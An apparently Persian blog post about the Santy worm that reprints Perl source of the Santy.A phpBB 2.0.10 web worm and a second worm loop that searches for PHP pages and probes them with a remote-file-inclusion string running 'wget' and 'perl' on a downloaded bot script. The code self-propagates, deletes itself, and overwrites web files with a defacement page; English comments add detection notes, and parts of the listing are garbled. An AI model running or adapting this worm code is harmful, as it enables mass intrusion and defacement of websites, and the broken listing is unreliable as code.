
شهرستان مهر*** انجمن مهندسان

 

بردبارى همچون قبیله است و نزدیکان که فراهم کند مردم را براى یارى انسان . [نهج البلاغه]

 
 


?شهرستان مهر -- سید مصطفی برهانی نسب

سه شنبه 89/9/23  ساعت 11:21 صبح

ویروس سانتی




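Solution: upgrade to phpBB version 2.0.11, which fixes the viewtopic.php highlight-parameter flaw that the worm below targets (phpBB 2.0.10 and earlier are affected).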


#
# Santy.A - phpBB <= 2.0.10 Web Worm Source Code (Proof of Concept)
# ~~ For educational purpose ~~
#
# See : http://isc.sans.org/diary.php?date=2004-12-21
# http://www.frsirt.com/alertes/20041221.phpbbworm.php
# http://www.f-secure.com/v-descs/santy_a.shtml
#
#!/usr/bin/perl
use
strict;
use Socket;


sub PayLoad();
sub DoDir($);
sub DoFile ($);
sub GoGoogle();

sub GrabURL($);
sub str2chr($);

# Top-level driver of the Santy.A proof-of-concept listing. As printed on this
# page the code is not valid Perl (the x placeholder below, the quoting in
# $perlOpen); it is kept verbatim for analysis only.
#
# Triage notes, all taken from the lines below:
#   - host artefact: a file named "m1ho2of" created through a relative path,
#     so it lands in whatever directory the exploited process runs in;
#   - host artefact: the script reads its own source and then unlinks its own
#     file, so a running copy may have no file left on disk;
#   - request artefact: viewtopic.php URLs whose highlight parameter carries
#     double-URL-encoded quote and dot (%2527, %252e) around system( or
#     fwrite(fopen( ;
#   - a file named "stop.it" in the working directory makes the loop exit.

# Detach from the launching process: the parent exits, the child continues.
eval{ fork and exit; };

# Generation counter; x is a placeholder in this listing, not a number.
my $generation = x;
# Above generation 3 the defacement routine runs before anything else.
PayLoad() if $generation > 3;

# Load this script's own text into memory, then delete the file on disk.
open IN, $0 or exit;
my $self = join "", <IN>;
close IN;
unlink $0;

# Connectivity gate: loops while the search engine cannot be fetched. Low
# generations exit; generations above 3 run the defacement routine instead.
while(!GrabURL("http://www.google.com/advanced_search")) {
if($generation > 3)
{
PayLoad() ;
} else {
exit;
}
}

# Rewrites the generation assignment inside the in-memory copy. The pattern
# expects digits, so it would not match the x placeholder shown above.
$self =~ s/my \$generation = (\d+);/"my $generation = " . ($1 + 1) . ";"/e;

# Fixed drop-file name and fixed marker string: both are stable indicators to
# search for on disk and in HTTP responses or access logs.
my $selfFileName = "m1ho2of";
my $markStr = "HYv9po4z3jjHWanN";
my $perlOpen = "perl -e "open OUT,q(>" . $selfFileName . ") and print q(" . $markStr . ")"";
my $tryCode = "&highlight=%2527%252Esystem(" . str2chr($perlOpen) . ")%252e%2527";

# Main loop. The stop.it check is repeated per candidate URL.
while(1) {
exit if -e "stop.it";

OUTER: for my $url (GoGoogle()) {

exit if -e "stop.it";

# Probe request: any existing highlight parameter is replaced by the test
# string, and the candidate is kept only if the marker appears in the reply.
$url =~ s/&highlight=.*$//;
$url .= $tryCode;
my $r = GrabURL($url);
next unless defined $r;
next unless $r =~ /$markStr/;

# The in-memory source is sent in pieces of at most 20 characters, one request
# per piece, so a single infection shows up as a long burst of near-identical
# viewtopic.php requests from one client in the access log.
while($self =~ /(.{1,20})/gs) {
my $portion = "&highlight=%2527%252Efwrite(fopen(" . str2chr($selfFileName) . "," . str2chr("a") . "),
" . str2chr($1) . "),exit%252e%2527";

$url =~ s/&highlight=.*$//;
$url .= $portion;

# A failed request abandons this candidate and moves to the next URL.
next OUTER unless GrabURL($url);
}

# Final request for this candidate; its reply is not inspected.
my $syst = "&highlight=%2527%252Esystem(" . str2chr("perl " . $selfFileName) . ")%252e%2527";
$url =~ s/&highlight=.*$//;
$url .= $syst;

GrabURL($url);
}
}



# str2chr: rewrites the argument character by character into a chain of
# chr(...) calls joined by %252e (a double-URL-encoded dot), then strips the
# trailing %252e and returns the result.
#
# Detection note: the output contains no literal text from the input, so
# matching on plain strings in the query is not enough; long runs of
# chr(NN)%252e inside a highlight parameter are the reliable log signature.
#
# NOTE(review): the replacement expression on the first s/// line is garbled
# in this listing ("or d(") and is left exactly as found.
sub str2chr($) {
my $s = shift;

$s =~ s/(.)/"chr(" . or d($1) . ")%252e"/seg;
$s =~ s/%252e$//;

return $s;
}


# GoGoogle: builds one search-engine query for URLs containing viewtopic.php
# plus a randomly chosen parameter name (t, p or topic) and a random number
# below 30000, fetches the result pages, and returns the list of matching
# links it finds in them.
#
# Candidates are selected by URL shape only; nothing here checks the forum
# version. Any indexed board with such URLs could be listed, so patching
# rather than low visibility is the relevant control.
#
# NOTE(review): several lines are garbled in this listing (the statement
# after the first GrabURL call, and the ". =" append); they are left as found.
sub GoGoogle() {
my @urls;
my @ts = qw/t p topic/;
my $startURL = "http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all" . "&
q=allinurl%3A+%22viewtopic.php%22+%22" . $ts[int(rand(@ts))] . "%3D" . int(rand(30000)) .
"%22&btnG=Search";
my $goo1st = GrabURL($startURL)
fined $goo1st;
my $allGoo = $goo1st;
# Pattern for the pagination links of the first result page; each linked page
# is fetched and appended to the text that is scanned below.
my $r = "<td><a href=(/search\?q=.+?)" . "><img src=/nav_page\.gif width=16 height=26
alt="" border=0><br>\d+</a>";
while($goo1st =~ m#$r#g) {
$allGoo . = GrabURL("www.google.com" . $1);
}
# Collect every absolute link containing viewtopic.php, skipping links that
# embed a second http:// (treated by the author as redirects).
while($allGoo =~ m#href=(http://\S+viewtopic.php\S+)#g) {
my $u = $1;
next if $u =~ m#http://.*http://#i; # no redirects
push(@urls, $u);
}

return @urls;
}


# GrabURL: minimal HTTP GET over a raw TCP socket. Takes a URL (the http://
# prefix is optional), returns the complete response text (headers and body)
# as one string, or nothing when the URL cannot be split into host and path
# or when resolving, creating the socket or connecting fails.
#
# Fingerprint for log review: every request carries the same static header
# set built below, including a fixed MSIE 6.0 User-Agent, a Referer equal to
# the requested URL itself, and Connection: close.
#
# NOTE(review): the request line is printed as "GET $resHTTP/1.0" with no
# space before HTTP; this looks like an extraction artefact and is left as is.
sub GrabURL($) {
my $url = shift;
$url =~ s#^http://##i;

# Split into host (up to the first slash) and the rest of the URL.
my ($host, $res) = $url =~ m#^(.+?)(/.*)#;
return unless defined($host) && defined($res);

my $r =
"GET $resHTTP/1.0\015\012" .
"Host: $host\015\012" .
"Accept:*/*\015\012" .
"Accept-Language: en-us,en-gb;q=0.7,en;q=0.3\015\012" .
"Pragma: no-cache\015\012" .
"Cache-Control: no-cache\015\012" .
"Referer: http://" . $host . $res . "\015\012" .

"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\015\012" .
"Connection: close\015\012\015\012";

# Default port 80 unless the host part ends in :digits.
my $port = 80;
if($host =~ /(.*):(\d+)$/){ $host = $1; $port = $2;}

my $internet_addr = inet_aton($host) or return;
socket(Server, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or return;
# Sets SO_RCVTIMEO to the value 10000; the result is not checked.
setsockopt(Server, SOL_SOCKET, SO_RCVTIMEO, 10000);

connect(Server, sockaddr_in($port, $internet_addr)) or return;
# Turn on autoflush for the socket handle, then restore the selected handle.
select((select(Server), $| = 1)[0]);
print Server $r;

# Reads until the peer closes the connection; there is no size limit.
my $answer = join "", <Server>;
close (Server);

return $answer;
}


# DoFile: replaces the file named by the first argument with a fixed HTML
# page that includes the current value of $generation. The original file is
# unlinked first, so its content is gone even if the rewrite then fails.
#
# Recovery note: affected files can be found by searching web roots for the
# strings "This site is defaced!!!" or "NeverEverNoSanity WebWorm generation";
# the originals have to come from backup.
sub DoFile($) {
my $s = q{
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD><TITLE>This site is defaced!!!</TITLE></HEAD>
<BODY bgcolor="#000000" text="#FF0000">
<H1>This site is defaced!!!</H1>
<HR><ADDRESS><b>NeverEverNoSanity WebWorm generation }
. $generation .q{.</b></ADDRESS>
</BODY></HTML>
};

# Two-argument open with the path interpolated into the mode string; on
# failure the sub returns without writing.
unlink $_[0];
open OUT, ">$_[0]" or return;
print OUT $s;
close OUT;
}


# DoDir: walks the directory given as first argument. Entries that are
# directories and not symbolic links are walked recursively; every other
# entry whose name contains .htm, .php, .asp, .shtm, .jsp or .phtm (case
# insensitive, anywhere in the name) is handed to DoFile.
#
# Scope note for incident response: the walk is limited only by what the
# process can open, so the blast radius equals the filesystem permissions of
# the account the web application runs as. Returns silently when the
# directory cannot be opened.
sub DoDir($) {

my $dir = $_[0];
# Ensure a trailing slash so entry names can be appended directly.
$dir .= "/" unless $dir =~ m#/$#;

# Localised handle so the recursive calls do not share one DIR handle.
local *DIR;
opendir DIR, $dir or return;

for my $ent (grep { $_ ne "." and $_ ne ".." } readdir DIR) {

unless(-l $dir . $ent) {
if(-d _) {
DoDir($dir . $ent);
next;
}
}

# The patterns are unanchored, so a name such as x.php.bak also matches.
if($ent =~ /\.htm/i or $ent =~ /\.php/i or $ent =~ /\.asp/i or $ent =~ /\.shtm/i or $ent =~ /\.jsp/i
or $ent =~ /\.phtm/i) {
DoFile($dir . $ent);
}
}

closedir DIR;
}


# PayLoad: builds a list of start directories and calls DoDir on each one.
# The list holds field 7 of every getpwent() record (the home directory of
# each account in the password database) plus the entry "/ " as printed.
#
# NOTE(review): this sub is damaged in the listing. The name is split
# ("Pay Load") and the statement inside the A..Z loop is cut off after
# "push(@d", so what that loop adds cannot be told from here.
sub Pay Load() {

my @dirs;


# getpwent is wrapped in eval so platforms without it do not abort the run.
eval{
while(my @a = getpwent()) { push(@dirs, $a[7]);}
};

push(@dirs, "/ ");

for my $l ("A" .. "Z") {
push(@d
for my $d (@dirs) {
DoDir($d);
}
}
****************************************
# Second listing on the page: a separate search-engine worm loop, printed
# without its preamble (no shebang or use lines are shown). get() is not
# defined in this listing; presumably LWP::Simple - confirm. The code uses
# package globals and bareword file handles throughout.
#
# What the visible lines do, for log and host triage:
#   1. query search engines for inurl:*.php?*=<random number> and save the
#      result URLs to a file in the current directory named with a random
#      integer below 9999;
#   2. fetch each saved page and collect its links into a hidden file whose
#      name is a dot followed by a random number;
#   3. cut each link after an equals sign, append $lista1 and request it.
# Step 3 looks like a remote-file-inclusion probe against PHP parameters
# (review inference). Usual hardening: never pass request parameters to
# include or require, and keep allow_url_include (and where possible
# allow_url_fopen) disabled.
while(1){

# Random work-file names, regenerated on every pass of the outer loop.
$numr = int rand(9999);
$caxe = ".";
$caxe1 = ".";
$caxe .= rand(9999);
$caxe1 .= rand(9999);
$arq = ".";
$arq = int rand(9999);

# Create or truncate the URL list file.
open(sites,">$arq");
print sites "";
close(sites);


# Search term: any .php URL with a parameter equal to the random number.
$procura = "inurl:*.php?*=" . $numr;

# First search engine: result pages are requested in steps of 10.
for($n=0;$n<900;$n += 10){
$sock = IO::Socket::INET->new(PeerAddr => "www.google.com.br", PeerPort
=> 80, Proto => "tcp") or next;
print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";
@resu = <$sock>;
close($sock);
$ae = "@resu";
# Each anchor is consumed in turn; the nested tests drop search-engine
# internal links and keep only http links, which are appended to the list.
while ($ae=~ m/<a href=.*?>.*?<\/a>/){
$ae=~ s/<a href=(.*?)>.*?<\/a>/$1/;
$uber=$1;
if ($uber !~/translate/)
{
if ($uber !~ /cache/)
{
if ($uber !~ /"/)
{
if ($uber !~ /google/)
{
if ($uber !~ /216/)
{
if ($uber =~/http/)
{
if ($uber !~ /start=/)
{
open(arq,">>$arq");
print arq "$uber\n";
close(arq);
}}}}}}}}}


# Second search engine, same term, results appended to the same list file.
for($cadenu=1;$cadenu <= 991; $cadenu +=10){

@cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1
&pstart=1&b=$cadenu") or next;
$ae = "@cade";

while ($ae=~ m/<em class=yschurl>.*?<\/em>/){
$ae=~ s/<em class=yschurl>(.*?)<\/em>/$1/;
$uber=$1;

$uber =~ s/ //g;
$uber =~ s/<b>//g;
$uber =~ s/<\/b>//g;

open(a,">>$arq");
print a "$uber\n";
close(a);
}}

# Remove duplicate lines from the list file, using %si as the seen-set.
$ark = $arq;
@si = "";
open (arquivo,"<$ark");
@si = <arquivo>;
close(arquivo);
$novo ="";
foreach (@si){
if (!$si{$_})
{
$novo .= $_;
$si{$_} = 1;
}
}
open (arquivo,">$ark");
print arquivo $novo;
close(arquivo);


# Load the de-duplicated list into @sites.
$a =0;
$b =0;
open(ae,"<$arq");
while(<ae>)
{$sites[$a] = $_;
chomp $sites[$a];
$a++;
$b++;}
close(ae);

# Per listed site: reset both hidden work files, fetch the page and write
# every link found on it to the first hidden file.
for ($a=0;$a<=$b;$a++){
open (file, ">$caxe");
print file "";
close(file);
open (file, ">$caxe1");
print file "";
close(file);
$k=0;
$e=0;
$data=get($sites[$a]) or next;
while($data=~ m/<a href=".*?">.*?<\/a>/){
$data=~ s/<a href="(.*?)">.*?<\/a>/$1/;
$ubersite=$1;

if ($ubersite =~/"/)
{
$nu = index $ubersite, """;
$ubersite = substr($ubersite,0,$nu);
}
if ($ubersite !~/http/)
{$ubersite = $sites[$a]."/".$ubersite;}
open(file,">>$caxe") || die("nao abriu caxe.txt $!");
print file "$ubersite\n";
close(file);
}

# String appended to candidate URLs. The host names in it are placeholders as
# printed on this page. In access logs the stable parts are a parameter value
# that is itself a URL followed by cmd=cd /tmp;wget and a perl invocation.
$lista1 = "http://server/spy.gif?&cmd=cd /tmp;wget www.server.tld/spybot.txt; perl spybot.txt";
# Other filenames included with this and other variants :
# adfkgnnodfijg
# bot
# bot.txt
# bot.txt.1
# dry.scp
# ssh.a
# terrorbot.txt
# terrorbot.txt.1
# terrorworm.txt
# terrorworm.txt.1
# unbot.txt
# unbot.txt.1
# unbot.txt.2
# unbot.txt.3
# unworm.txt
# unworm.txt.1
# unworm.txt.2
# unworm.txt.3
# worm1.txt
# worm.txt
# worm.txt.1
# Load the collected links into @ja.
$t =0;
$y =0;
@ja;
open(opa,"<$caxe") or die "nao deu pra abrir o arquivo caxe.txt";
while (<opa>)
{
$ja[$t] = $_;
chomp $ja[$t];
$t++;
$y++;
}
close(opa);
# For every link containing an equals sign, two variants are written to the
# second hidden file: the link cut after its last equals sign and the link
# cut after its first equals sign, each with $lista1 appended.
$t=1;
while ($t < $y)
{
if ($ja[$t] =~/=/)
{
$num = rindex $ja[$t], "=";
$num += 1;
$ja[$t] = substr($ja[$t],0,$num);
open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt";
print jaera "$ja[$t]$lista1\n";
close(jaera);
$num = index $ja[$t], "=";
$num += 1;
$ja[$t] = substr($ja[$t],0,$num);
$num1 = rindex $ja[$t], ".";
$subproc = substr($ja[$t],$num1,$num);

open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt";
print jaera "$ja[$t]$lista1\n";
close(jaera);
}
$t++;
}
# Remove duplicate lines from the second hidden file.
$ark = "$caxe1";
@si = "";
open (arquivo,"<$ark");
@si = <arquivo>;
close(arquivo);
$novo ="";
foreach (@si){
if (!$si{$_})
{
$novo .= $_;
$si{$_} = 1;
}
}
open (arquivo,">$ark");
print arquivo $novo;
close(arquivo);
# Load the final URL list into @hot.
$q=0;
$w=0;
@hot;
open (ops,"<$caxe1");
while(<ops>)
{
$hot[$q] = $_;
chomp $hot[$q];
$q++;
$w++;
}
close(ops);

# Each http URL in the list is requested once; the response is stored in
# $tipo and not examined anywhere in the visible code.
for($q=0;$q<=$w;$q++)
{

if ($hot[$q] =~/http/)
{
$tipo=get($hot[$q]) or next;
}}
}
}
*********************
 
